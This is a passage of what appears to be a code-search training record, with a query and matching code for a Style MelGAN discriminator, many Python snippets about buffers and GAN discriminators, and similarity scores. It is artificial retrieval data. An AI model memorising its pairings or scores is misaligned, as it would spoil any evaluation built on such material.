x_sample, wav_len):\n\t\tpass\n\t\t# s_STMS_sample, d_STMS_sample, x_STMS_sample = self.transfrom_stats(s_sample,\n\t\t# \td_sample, x_sample, wav_len)\n\t\t# smm_sample = tf.math.truediv(s_STMS_sample, x_STMS_sample)\n\t\t# self.smm_map.stats(smm_sample)", "def _make_buffer(self, width, height):\n fb_prop = p3d.FrameBufferProperties(p3d.FrameBufferProperties.get_default())\n fb_prop.set_multisamples(self._multisamples)\n fb_prop.set_srgb_color(self._srgb_color)\n\n self._buffer = self._engine.make_output(\n self._pipe, name=\"offscreen\", sort=0,\n fb_prop=p3d.FrameBufferProperties.get_default(),\n win_prop=p3d.WindowProperties(size=(width, height)),\n flags=p3d.GraphicsPipe.BFRefuseWindow)\n\n self._region = self._buffer.make_display_region()\n\n self._depth_tex = p3d.Texture()\n self._depth_tex.setFormat(p3d.Texture.FDepthComponent)\n self._buffer.addRenderTexture(\n self._depth_tex, p3d.GraphicsOutput.RTMCopyRam, p3d.GraphicsOutput.RTPDepth)\n\n self._color_tex = p3d.Texture()\n self._color_tex.setFormat(p3d.Texture.FRgba8)\n self._buffer.addRenderTexture(\n self._color_tex, p3d.GraphicsOutput.RTMCopyRam, p3d.GraphicsOutput.RTPColor)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_B2i2B.pack(_x.partial_view, _x.resolution, _x.type, _x.use_simple_occlusion, _x.add_point_colors))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def _init_plot_buffer(self, configuration):\n if not isinstance(configuration, dict):\n configuration = { 'length': configuration }\n\n # initialize vao/vbo\n vao, vbo = util.VAO(), util.VBO()\n\n # put kernel function into vertex shader\n vertex_shader_kernel = open(SHADER_DIR+'/data.vert.glsl').read()\n if configuration['kernel'] is not None:\n vertex_shader_kernel = vertex_shader_kernel.replace(\n self.KERNEL_PLACEHOLDER,\n configuration['kernel'])\n\n shader = util.Shader(\n vertex=vertex_shader_kernel,\n geometry=open(SHADER_DIR+'/data.geom.glsl').read(),\n fragment=open(SHADER_DIR+'/data.frag.glsl').read(),\n link=True\n )\n norm = configuration.get('norm', float)\n buffer_configuration = {\n 'byte_count': configuration['length'] * 4,\n 'vertex_count': configuration['length']/2,\n 'point_base_color': configuration.get('point_base_color', [0,0,0.5,1]),\n 'point_size': configuration.get('point_size', norm(2.0/configuration['length'])),\n 'vao': vao,\n 'vbo': vbo,\n 'shader': shader\n }\n\n # uniforms\n shader.uniform('mat_plane', self._mat_plot)\n shader.uniform('geometry_color', buffer_configuration['point_base_color'])\n shader.uniform('dot_size', buffer_configuration['point_size'])\n\n # configure vbo\n with vbo.get(0):\n vertex_position = shader.attributeLocation('vertex_position')\n glBufferData(GL_ARRAY_BUFFER, buffer_configuration['byte_count'], None, GL_STATIC_DRAW)\n with vao:\n glVertexAttribPointer(vertex_position, 2, GL_FLOAT, GL_FALSE, 0, None)\n glEnableVertexAttribArray(0)\n\n return buffer_configuration", "def __init__(self, buffer_size, random_seed=123):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n random.seed(random_seed)", "def __init__(self, buffer_size, random_seed=123):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n random.seed(random_seed)", "def __init__(self, buffer_size, random_seed=123):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n random.seed(random_seed)", "def __init__(self, buffer_size, random_seed=123):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n random.seed(random_seed)", "def __init__(self, buffer_size, random_seed=123):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n random.seed(random_seed)", "def __init__(self, buffer_size, random_seed=123):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n random.seed(random_seed)", "def serialize(self, buff):\n try:\n _x = self.Class\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_d4q().pack(_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def _refresh_buffers(self) -> None:", "def pack(self,buffer):\n buffer.append(self.data)", "def __init__(self, buffer_size, random_seed=0):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n random.seed(random_seed)", "def __allgather_like(\n self,\n func: Callable,\n sendbuf: Union[DNDarray, torch.Tensor, Any],\n recvbuf: Union[DNDarray, torch.Tensor, Any],\n axis: int,\n **kwargs,\n ):\n # dummy allocation for *v calls\n # ToDO: Propper implementation of usage\n send_counts, send_displs, recv_counts, recv_displs = None, None, None, None\n\n # unpack the send buffer\n if isinstance(sendbuf, tuple):\n sendbuf, send_counts, send_displs = sendbuf\n if isinstance(sendbuf, DNDarray):\n sendbuf = sendbuf.larray\n if not isinstance(sendbuf, torch.Tensor) and axis != 0:\n raise TypeError(\n f\"sendbuf of type {type(sendbuf)} does not support concatenation axis != 0\"\n )\n # unpack the receive buffer\n if isinstance(recvbuf, tuple):\n recvbuf, recv_counts, recv_displs = recvbuf\n if isinstance(recvbuf, DNDarray):\n recvbuf = recvbuf.larray\n if not isinstance(recvbuf, torch.Tensor) and axis != 0:\n raise TypeError(\n f\"recvbuf of type {type(recvbuf)} does not support concatenation axis != 0\"\n )\n\n # keep a reference to the original buffer object\n original_recvbuf = recvbuf\n sbuf_is_contiguous, rbuf_is_contiguous = None, None\n # permute the send_axis order so that the split send_axis is the first to be transmitted\n if axis != 0:\n send_axis_permutation = list(range(sendbuf.ndimension()))\n send_axis_permutation[0], send_axis_permutation[axis] = axis, 0\n sendbuf = sendbuf.permute(*send_axis_permutation)\n sbuf_is_contiguous = False\n\n recv_axis_permutation = list(range(recvbuf.ndimension()))\n recv_axis_permutation[0], recv_axis_permutation[axis] = axis, 0\n recvbuf = recvbuf.permute(*recv_axis_permutation)\n rbuf_is_contiguous = False\n else:\n recv_axis_permutation = None\n\n sbuf = sendbuf if CUDA_AWARE_MPI or not isinstance(sendbuf, torch.Tensor) else sendbuf.cpu()\n rbuf = recvbuf if CUDA_AWARE_MPI or not isinstance(recvbuf, torch.Tensor) else recvbuf.cpu()\n\n # prepare buffer objects\n if sendbuf is MPI.IN_PLACE or not isinstance(sendbuf, torch.Tensor):\n mpi_sendbuf = sbuf\n else:\n mpi_sendbuf = self.as_buffer(sbuf, send_counts, send_displs, sbuf_is_contiguous)\n if send_counts is not None:\n mpi_sendbuf[1] = mpi_sendbuf[1][0][self.rank]\n\n if recvbuf is MPI.IN_PLACE or not isinstance(recvbuf, torch.Tensor):\n mpi_recvbuf = rbuf\n else:\n mpi_recvbuf = self.as_buffer(rbuf, recv_counts, recv_displs, rbuf_is_contiguous)\n if recv_counts is None:\n mpi_recvbuf[1] //= self.size\n # perform the scatter operation\n exit_code = func(mpi_sendbuf, mpi_recvbuf, **kwargs)\n return exit_code, sbuf, rbuf, original_recvbuf, recv_axis_permutation", "def add_to_buffer(self, values):\n self._buffer.extend(values)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_B2i2B.pack(_x.partial_view, _x.resolution, _x.type, _x.use_simple_occlusion, _x.add_point_colors))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def __init__(self, max_entries, buffer_config):\n self.max_entries = max_entries\n \n self.data_dict = dict()\n for key, val in buffer_config.items():\n if (type(val) == int):\n shape = (self.max_entries, val)\n elif (type(val) == tuple):\n shape = (self.max_entries,) + val\n else:\n raise Exception(\"Not a valid buffer_config.\")\n self.data_dict[key] = np.zeros(shape)\n\n self.start_idx = 0\n self.num_entries = 0", "def _sample_indication(self, buf, addr):\n #print 'Buffer, Address:', buf, addr\n try:\n #We may be (or may not be!) in need of translating our data with: hexlify or unhexlify. \n data = hexlify(str(buf))\n print 'RAW data: ', buf\n print 'heXlify data: ', data\n except:\n traceback.print_exc()\n self.property_set('data_channel', Sample(0, str(data), 'hex'))", "def __init__(self, buffer_size, batch_size, random_seed=1234):\n self.tree = PER.sum_tree.SumTree(buffer_size)\n self.batch_size = batch_size\n self.episode = []\n self.s_prev, self.s_ori_prev, self.a_prev, self.r_prev, self.v_prev, self.distribution, self.mask = \\\n None, None, None, None, None, None, None\n\n # p_i = (p + e)^a\n self.e = 0.00000001\n self.a = 0.6 # values suggested by authors\n self.beta = 0.4 # to 1 - values suggested by authors\n\n self.previous_index = None # TODO\n random.seed(random_seed)", "def set(self, i, buf):\n self.buf = buf\n self.buf_i = i\n self.avg = None if len(buf) == 0 else (sum(buf) / len(buf))", "def add(self, stats):\n self.n += stats.n\n self.loss += stats.loss\n self.accuracy += stats.accuracy\n self.grad_norm = max(self.grad_norm, stats.grad_norm)" ]
[ "0.51819456", "0.5043784", "0.49926385", "0.4946909", "0.49447924", "0.49344134", "0.4884747", "0.4879836", "0.48627967", "0.48563662", "0.48147842", "0.47965068", "0.478542", "0.47853506", "0.47853506", "0.47853506", "0.47518125", "0.4747054", "0.47394067", "0.47262183", "0.47090402", "0.46921518", "0.4690415", "0.46888068", "0.46444273", "0.46443155", "0.46159935", "0.45845237", "0.45827752", "0.45766237", "0.45754996", "0.4555112", "0.45486367", "0.45222935", "0.45174807", "0.45113292", "0.44989887", "0.44916773", "0.4486421", "0.44861734", "0.44837", "0.4477309", "0.44673946", "0.44634074", "0.44605765", "0.44529518", "0.4445916", "0.44332668", "0.44286054", "0.44270113", "0.4426935", "0.44128686", "0.44120482", "0.440753", "0.4395778", "0.43851164", "0.43849263", "0.43790245", "0.43759242", "0.43674827", "0.43658814", "0.43615767", "0.43609047", "0.4357091", "0.43558693", "0.43532503", "0.4352153", "0.43509862", "0.4349529", "0.43443254", "0.43299758", "0.4324603", "0.43183723", "0.43094978", "0.43067598", "0.42958173", "0.42896312", "0.42895344", "0.42774045", "0.42762828", "0.42730883", "0.42696407", "0.4267263", "0.4267263", "0.4267263", "0.4267263", "0.4267263", "0.4267263", "0.42607692", "0.42594817", "0.42591852", "0.4258335", "0.42537183", "0.42518082", "0.42446023", "0.42444953", "0.42429477", "0.42389432", "0.4237158", "0.42306983" ]
0.67643166
0
Initilize Style MelGAN discriminator.
def __init__( self, repeats=2, window_sizes=[512, 1024, 2048, 4096], pqmf_params=[ [1, None, None, None], [2, 62, 0.26700, 9.0], [4, 62, 0.14200, 9.0], [8, 62, 0.07949, 9.0], ], discriminator_params={ "out_channels": 1, "kernel_sizes": [5, 3], "channels": 16, "max_downsample_channels": 512, "bias": True, "downsample_scales": [4, 4, 4, 1], "nonlinear_activation": "LeakyReLU", "nonlinear_activation_params": {"negative_slope": 0.2}, "pad": "ReflectionPad1d", "pad_params": {}, }, use_weight_norm=True, ): super().__init__() # window size check assert len(window_sizes) == len(pqmf_params) sizes = [ws // p[0] for ws, p in zip(window_sizes, pqmf_params)] assert len(window_sizes) == sum([sizes[0] == size for size in sizes]) self.repeats = repeats self.window_sizes = window_sizes self.pqmfs = torch.nn.ModuleList() self.discriminators = torch.nn.ModuleList() for pqmf_param in pqmf_params: d_params = copy.deepcopy(discriminator_params) d_params["in_channels"] = pqmf_param[0] if pqmf_param[0] == 1: self.pqmfs += [torch.nn.Identity()] else: self.pqmfs += [PQMF(*pqmf_param)] self.discriminators += [BaseDiscriminator(**d_params)] # apply weight norm if use_weight_norm: self.apply_weight_norm() # reset parameters self.reset_parameters()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self):\n super(Discriminator, self).__init__()\n\n # Use stride in convolutions to downsample image to size 1\n\n # Using BatchNorm2d 0.8 for stability based on reading of https://github.com/eriklindernoren/PyTorch-GAN code\n layers = [nn.Conv2d(512, 1, kernel_size=4, stride=1, padding=0, bias=True),\n nn.Flatten(), nn.Sigmoid()]\n for i in range(3):\n out_chans = int(512 / (2 ** i))\n in_chans = int(out_chans / 2)\n layers.insert(0, nn.LeakyReLU(0.2, inplace=True))\n layers.insert(0, nn.BatchNorm2d(out_chans, 0.8))\n layers.insert(0, nn.Conv2d(in_chans, out_chans, kernel_size=4, stride=2, padding=1, bias=False))\n layers.insert(0, nn.LeakyReLU(0.2, inplace=True))\n layers.insert(0, nn.BatchNorm2d(64, 0.8))\n layers.insert(0, nn.Conv2d(3, 64, kernel_size=4, stride=2, padding=1, bias=False))\n print(layers)\n self.network = nn.Sequential(*layers)", "def __init__(self, input_nc=3, ndf=64, n_layers=3, norm_type='spectral'):\n super(Discriminator_PatchGAN, self).__init__()\n self.n_layers = n_layers\n norm_layer = self.get_norm_layer(norm_type=norm_type)\n kw = 4\n padw = int(np.ceil((kw - 1.0) / 2))\n sequence = [[self.use_spectral_norm(nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), norm_type), nn.LeakyReLU(0.2, True)]]\n nf = ndf\n for n in range(1, n_layers):\n nf_prev = nf\n nf = min(nf * 2, 512)\n sequence += [[self.use_spectral_norm(nn.Conv2d(nf_prev, nf, kernel_size=kw, stride=2, padding=padw), norm_type), norm_layer(nf), nn.LeakyReLU(0.2, True)]]\n nf_prev = nf\n nf = min(nf * 2, 512)\n sequence += [[self.use_spectral_norm(nn.Conv2d(nf_prev, nf, kernel_size=kw, stride=1, padding=padw), norm_type), norm_layer(nf), nn.LeakyReLU(0.2, True)]]\n sequence += [[self.use_spectral_norm(nn.Conv2d(nf, 1, kernel_size=kw, stride=1, padding=padw), norm_type)]]\n self.model = nn.Sequential()\n for n in range(len(sequence)):\n self.model.add_module('child' + str(n), nn.Sequential(*sequence[n]))\n self.model.apply(self.weights_init)", "def model_setup(self):\n self.DNN = SganMLP(self.settings.number_of_bins)\n self.D = SganMLP(self.settings.number_of_bins)\n self.G = Generator()", "def __init__(self,opt):\n super(SNPatchDiscriminator, self).__init__()\n # if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine parameters\n # use_bias = norm_layer.func == nn.InstanceNorm2d\n # else:\n # use_bias = norm_layer == nn.InstanceNorm2d\n\n kw = 4\n padw = 1\n n_layers = 3\n ndf = opt.ndf\n use_bias = True\n sequence = [nn.utils.spectral_norm(nn.Conv2d(opt.input_nc, ndf, kernel_size=kw, stride=2, padding=padw)), nn.LeakyReLU(0.2, True)]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 4)\n sequence += [\n nn.utils.spectral_norm(nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw, bias=use_bias)),\n # norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n self.model = nn.Sequential(*sequence)", "def build_discriminator(self):\n with tf.variable_scope(\"discriminator\") as scope:\n\n # --- build the convolutional layers\n self.d_convlayers = list()\n mi = self.num_colors\n dim = self.img_dim\n count = 0\n for mo, filter_size, stride, apply_batch_norm in self.d_sizes['conv_layers']:\n name = f\"convlayer_{count}\" # name is used for get_variable later\n count += 1\n layer = ConvLayer(name, mi, mo, apply_batch_norm, filter_size, stride, lrelu)\n self.d_convlayers.append(layer)\n mi = mo\n print(f\"dim: {dim}\")\n # --- keep track of image dimensionality: need this for the first Dense layer\n dim = int(np.ceil(float(dim) / stride))\n\n # --- get the input dimensionalith for the first Dense layer\n mi = mi * dim * dim\n\n # --- build the dense layers\n self.d_denselayers = list()\n for mo, apply_batch_norm in self.d_sizes['dense_layers']:\n name = f\"denselayer_{count}\"\n count += 1\n layer = DenseLayer(name, mi, mo, apply_batch_norm, lrelu)\n mi = mo\n self.d_denselayers.append(layer)\n\n # --- final logistic regression layer (use it in the d_forward\n # function below to get the final logits)\n name = f\"denselayer_{count}\"\n self.d_finallayer = DenseLayer(name, mi, 1, False, lambda x: x)\n\n # --- get and return the logits\n logits = self.d_forward(self.X)\n return logits", "def init_net(self):\r\n # initialize the generator network\r\n g_net = Net(\r\n self.architecture['generator'], net_name='gen',\r\n data_format=FLAGS.IMAGE_FORMAT, num_class=self.num_class)\r\n # define layer connections in generator\r\n self.Gen = Routine(g_net)\r\n self.Gen.add_input_layers([64, self.code_size], [0])\r\n self.Gen.seq_links(list(range(g_net.num_layers)))\r\n self.Gen.add_output_layers([g_net.num_layers - 1])\r\n\r\n # initialize the generator network\r\n d_net = Net(\r\n self.architecture['discriminator'], net_name='dis',\r\n data_format=FLAGS.IMAGE_FORMAT, num_class=self.num_class)\r\n # define layer connections in generator\r\n self.Dis = Routine(d_net)\r\n self.Dis.add_input_layers([64] + list(self.architecture['input'][0]), [0])\r\n self.Dis.seq_links(list(range(d_net.num_layers)))\r\n self.Dis.add_output_layers([d_net.num_layers - 1])", "def __init__(self):\n\n super(GlobalDiscriminator, self).__init__()\n\n # input image will have the size of 64x64x3\n self.first_conv_layer = TransitionDown(in_channels=3, out_channels=32, kernel_size=5)\n self.second_conv_layer = TransitionDown(in_channels=32, out_channels=32, kernel_size=5)\n self.third_conv_layer = TransitionDown(in_channels=32, out_channels=64, kernel_size=5)\n self.fourth_conv_layer = TransitionDown(in_channels=64, out_channels=64, kernel_size=5)\n\n self.fc1 = nn.Linear(5 * 5 * 64, 1)\n\n torch.nn.init.xavier_uniform(self.fc1.weight)", "def __init__(self, image_size):\n super(SiameseDiscriminator, self).__init__()\n self.cnn1 = nn.Sequential(\n nn.ReflectionPad2d(1),\n nn.Conv2d(3, 4, kernel_size=3),\n nn.LeakyReLU(0.1, inplace=True),\n nn.BatchNorm2d(4),\n nn.Dropout2d(p=.2),\n\n nn.ReflectionPad2d(1),\n nn.Conv2d(4, 8, kernel_size=3),\n nn.LeakyReLU(0.1, inplace=True),\n nn.BatchNorm2d(8),\n nn.Dropout2d(p=.2),\n\n nn.ReflectionPad2d(1),\n nn.Conv2d(8, 8, kernel_size=3),\n nn.LeakyReLU(0.1, inplace=True),\n nn.BatchNorm2d(8),\n nn.Dropout2d(p=.2))\n\n self.fc1 = nn.Sequential(\n nn.Linear(8 * image_size * image_size, 500),\n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Linear(500, 500),\n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Linear(500, 15))", "def model_setup(self):\n self.DNN = DgganMLP(self.settings.hidden_size)\n self.D = DgganMLP(self.settings.hidden_size)\n self.G = Generator(self.settings.hidden_size)", "def discriminator(self):\n\n # Initializate the neural network\n discriminator = Sequential()\n\n # Convolution, bias, activate\n discriminator.add(Conv2D(filters=self.first_layer_filter,\n kernel_size=self.kernel_size,\n strides=self.stride_size,\n padding='same',\n data_format='channels_last',\n kernel_initializer='glorot_uniform',\n input_shape=self.image_shape))\n # Activate\n discriminator.add(LeakyReLU(0.2))\n # Convolution\n discriminator.add(Conv2D(filters=self.second_layer_filter,\n kernel_size=self.kernel_size,\n strides=self.stride_size,\n padding='same',\n data_format='channels_last',\n kernel_initializer='glorot_uniform'))\n\n # Normalize\n discriminator.add(BatchNormalization(momentum=0.5, epsilon=1e-5))\n # Activate\n discriminator.add(LeakyReLU(0.2))\n\n # Convolution\n discriminator.add(Conv2D(filters=self.third_layer_filter,\n kernel_size=self.kernel_size,\n strides=self.stride_size,\n padding='same',\n data_format='channels_last',\n kernel_initializer='glorot_uniform'))\n\n # Normalize\n discriminator.add(BatchNormalization(momentum=0.5, epsilon=1e-5))\n # Activate\n discriminator.add(LeakyReLU(0.2))\n # Convolution\n discriminator.add(Conv2D(filters=self.last_layer_size,\n kernel_size=self.kernel_size,\n strides=self.stride_size,\n padding='same',\n data_format='channels_last',\n kernel_initializer='glorot_uniform'))\n # Normalize\n discriminator.add(BatchNormalization(momentum=0.5, epsilon=1e-5))\n # Activate\n discriminator.add(LeakyReLU(0.2))\n\n discriminator.add(Flatten())\n discriminator.add(Dense(1))\n discriminator.add(Activation('sigmoid'))\n\n optimizer = Adam(lr=self.lr, beta_1=self.beta)\n discriminator.compile(loss=self.loss,\n optimizer=optimizer,\n metrics=None)\n\n return discriminator", "def __init__(\n self, config: SimpleGCNConfig = SimpleGCNConfig(name=\"simplegcn\")\n ):\n super().__init__()\n self.edge_lengthscale = config.edge_lengthscale\n self.weight_edges = config.weight_edges\n\n self.atom_embedding = nn.Linear(\n config.atom_input_features, config.width\n )\n\n self.layer1 = GraphConv(config.width, config.width)\n self.layer2 = GraphConv(config.width, config.output_features)\n self.readout = AvgPooling()", "def __init__(self, num_gpus):\n\n super(Discriminator, self).__init__()\n n_in = IMG_CHANNELS\n n_out = 1\n\n feature_map = IMG_SIZE\n kernel_size = 4\n stride = 2\n padding = 1\n bias = False\n\n self.num_gpus = num_gpus\n\n self.network = nn.Sequential(\n # input is image\n nn.Conv2d(n_in, feature_map, kernel_size, stride, padding, bias=bias),\n nn.LeakyReLU(0.2, inplace=True),\n\n # nodes = feature_map * 2\n nn.Conv2d(feature_map, feature_map * 2, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 2),\n nn.LeakyReLU(0.2, inplace=True),\n\n # nodes = feature_map * 4\n nn.Conv2d(feature_map * 2, feature_map * 4, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 4),\n nn.LeakyReLU(0.2, inplace=True),\n\n # nodes = feature_map * 8\n nn.Conv2d(feature_map * 4, feature_map * 8, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 8),\n nn.LeakyReLU(0.2, inplace=True),\n\n # nodes = 1\n nn.Conv2d(feature_map * 8, n_out, kernel_size, 1, 0, bias=bias),\n nn.Sigmoid()\n )", "def discriminator(self, discriminator: str):\n pass # setter is ignored for discriminator property", "def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d):\n super(GLConvDiscriminator, self).__init__()\n\n kw = 4\n padw = 1\n sequence = [\n DiscriminatorBlock(input_nc, ndf, downsample=True)\n ]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n DiscriminatorBlock(ndf * nf_mult_prev, ndf * nf_mult)\n ]\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n # sequence += [DiscriminatorBlock(ndf * nf_mult_prev, ndf * nf_mult, downsample=False)]\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=3, stride=1, padding=1),\n nn.InstanceNorm2d(ndf*nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n self.model = nn.Sequential(*sequence)\n self.patchgan_conv = nn.Conv2d(ndf * nf_mult, 1, kernel_size=3, stride=1, padding=1)\n # self.global_conv = nn.Conv2d(ndf * nf_mult, ndf * nf_mult, kernel_size=3, stride=1, padding=1)", "def setup_net(self):\n\t\tself.src_net = get_model(self.base_model, num_cls=self.num_cls, \\\n\t\t\t\t\t\t\t\t l2_normalize=self.l2_normalize, temperature=self.temperature)\n\t\tself.tgt_net = self.custom_copy(self.src_net, self.weight_sharing)\n\n\t\tinput_dim = self.num_cls\n\t\tself.discriminator = nn.Sequential(\n\t\t\t\tnn.Linear(input_dim, 500),\n\t\t\t\tnn.ReLU(),\n\t\t\t\tnn.Linear(500, 500),\n\t\t\t\tnn.ReLU(),\n\t\t\t\tnn.Linear(500, 2),\n\t\t\t\t)\n\n\t\tself.image_size = self.src_net.image_size\n\t\tself.num_channels = self.src_net.num_channels", "def __init__(self, **config):\n super(Classifier, self).__init__()\n self.input_dim_drug = config['hidden_dim_drug']\n self.input_dim_protein = config['hidden_dim_protein']\n self.hidden_dims = config['cls_hidden_dims']\n self.visual_attention=config['visual_attention']\n dims = [self.input_dim_drug + self.input_dim_protein] + self.hidden_dims + [2]\n if config['attention']:\n if config['concatenation']:\n dims[0]+=config['cnn_target_filters'][-1]\n else:\n dims[0]=self.input_dim_drug+config['cnn_target_filters'][-1]\n self.predictor = nn.ModuleList([nn.Linear(dims[i], dims[i + 1]) for i in range(len(self.hidden_dims)+1)])\n self.dropout = nn.Dropout(0.25)\n self._initialize()", "def build_discriminator():\n leakyrelu_alpha = 0.2\n momentum = 0.8\n input_shape = (256, 256, 3)\n\n input_layer = Input(shape=input_shape)\n\n # Add the first convolution block\n dis1 = Conv2D(filters=64, kernel_size=3, strides=1, padding='same')(input_layer)\n dis1 = LeakyReLU(alpha=leakyrelu_alpha)(dis1)\n\n # Add the 2nd convolution block\n dis2 = Conv2D(filters=64, kernel_size=3, strides=2, padding='same')(dis1)\n dis2 = LeakyReLU(alpha=leakyrelu_alpha)(dis2)\n dis2 = BatchNormalization(momentum=momentum)(dis2)\n\n # Add the third convolution block\n dis3 = Conv2D(filters=128, kernel_size=3, strides=1, padding='same')(dis2)\n dis3 = LeakyReLU(alpha=leakyrelu_alpha)(dis3)\n dis3 = BatchNormalization(momentum=momentum)(dis3)\n\n # Add the fourth convolution block\n dis4 = Conv2D(filters=128, kernel_size=3, strides=2, padding='same')(dis3)\n dis4 = LeakyReLU(alpha=leakyrelu_alpha)(dis4)\n dis4 = BatchNormalization(momentum=0.8)(dis4)\n\n # Add the fifth convolution block\n dis5 = Conv2D(256, kernel_size=3, strides=1, padding='same')(dis4)\n dis5 = LeakyReLU(alpha=leakyrelu_alpha)(dis5)\n dis5 = BatchNormalization(momentum=momentum)(dis5)\n\n # Add the sixth convolution block\n dis6 = Conv2D(filters=256, kernel_size=3, strides=2, padding='same')(dis5)\n dis6 = LeakyReLU(alpha=leakyrelu_alpha)(dis6)\n dis6 = BatchNormalization(momentum=momentum)(dis6)\n\n # Add the seventh convolution block\n dis7 = Conv2D(filters=512, kernel_size=3, strides=1, padding='same')(dis6)\n dis7 = LeakyReLU(alpha=leakyrelu_alpha)(dis7)\n dis7 = BatchNormalization(momentum=momentum)(dis7)\n\n # Add the eight convolution block\n dis8 = Conv2D(filters=512, kernel_size=3, strides=2, padding='same')(dis7)\n dis8 = LeakyReLU(alpha=leakyrelu_alpha)(dis8)\n dis8 = BatchNormalization(momentum=momentum)(dis8)\n\n # Add a dense layer\n #avgd = keras.layers.AveragePooling2D(pool_size=(4,4) , strides = (4,4))(dis8)\n\n #flat = keras.layers.Flatten()(dis8)\n dis9 = Dense(units=1024)(dis8)\n dis9 = LeakyReLU(alpha=0.2)(dis9)\n\n # Last dense layer - for classification\n output = Dense(units=1, activation='sigmoid')(dis9)\n\n model = Model(inputs=[input_layer], outputs=[output], name='discriminator')\n return model", "def __init__(self, config, set_name, preprocess_image):\n\t\t\tself.data_dir = config['data_dir']\n\t\t\tself.set_name = set_name\n\t\t\tself.coco = COCO(os.path.join(self.data_dir, 'annotations', 'instances_' + set_name + '.json'))\n\t\t\tself.image_ids = self.coco.getImgIds()\n\t\t\tself.mask = config['mask']\n\n\t\t\tself.load_classes()\n\n\t\t\tsuper(CocoGenerator, self).__from_config__(config, preprocess_image=preprocess_image)", "def __init__(self, n, sick_init, social_dist, radius=0.01, styles=None, total_beds=10, box_length=1, recovery_time=1000):\n\n self.init_persons(n, sick_init, social_dist, radius, box_length, recovery_time, total_beds, styles)\n self.init_hospital(total_beds)", "def __init__(self, input_nc, opt_net,ndf=64, n_layers=DEFAULT_N_LAYERS, norm_layer=nn.BatchNorm2d):\n super(PatchGAN_Discriminator, self).__init__()\n if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine parameters\n use_bias = norm_layer.func != nn.BatchNorm2d\n else:\n use_bias = norm_layer != nn.BatchNorm2d\n\n self.decomposed_input = bool(opt_net['decomposed_input'])\n self.pre_clipping = bool(opt_net['pre_clipping'])\n projected_component_sequences = []\n in_ch_addition = input_nc if self.decomposed_input else 0\n kw = 4\n padw = 1\n max_out_channels = 512\n sequences = [nn.Sequential(*[nn.Conv2d(input_nc+in_ch_addition, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)])]\n # if self.decomposed_input:\n # projected_component_sequences = [nn.Conv2d(input_nc, input_nc, kernel_size=kw, stride=2, padding=padw)]\n\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n # nf_mult_prev = nf_mult\n # nf_mult = min(2 ** max(0,n-n_layers+self.DEFAULT_N_LAYERS), 8)\n nf_mult_prev = min(max_out_channels, ndf * nf_mult) // ndf\n nf_mult = min(2 ** n, 8)\n sequences.append(nn.Sequential(*[\n nn.Conv2d(ndf * nf_mult_prev+in_ch_addition, min(max_out_channels, ndf * nf_mult), kernel_size=kw,\n stride=2 if n > n_layers - self.DEFAULT_N_LAYERS else 1,\n padding=padw, bias=use_bias), norm_layer(ndf * nf_mult), nn.LeakyReLU(0.2, True)]))\n # if self.decomposed_input:\n # projected_component_sequences.append(\n # nn.Conv2d(input_nc,input_nc, kernel_size=kw,\n # stride=2 if n > n_layers - self.DEFAULT_N_LAYERS else 1,\n # padding=padw, bias=use_bias))\n\n # nf_mult_prev = nf_mult\n nf_mult_prev = min(max_out_channels, ndf * nf_mult) // ndf\n nf_mult = min(2 ** n_layers, 8)\n sequences.append(nn.Sequential(*[\n nn.Conv2d(ndf * nf_mult_prev+in_ch_addition, min(max_out_channels, ndf * nf_mult), kernel_size=kw, stride=1,\n padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n 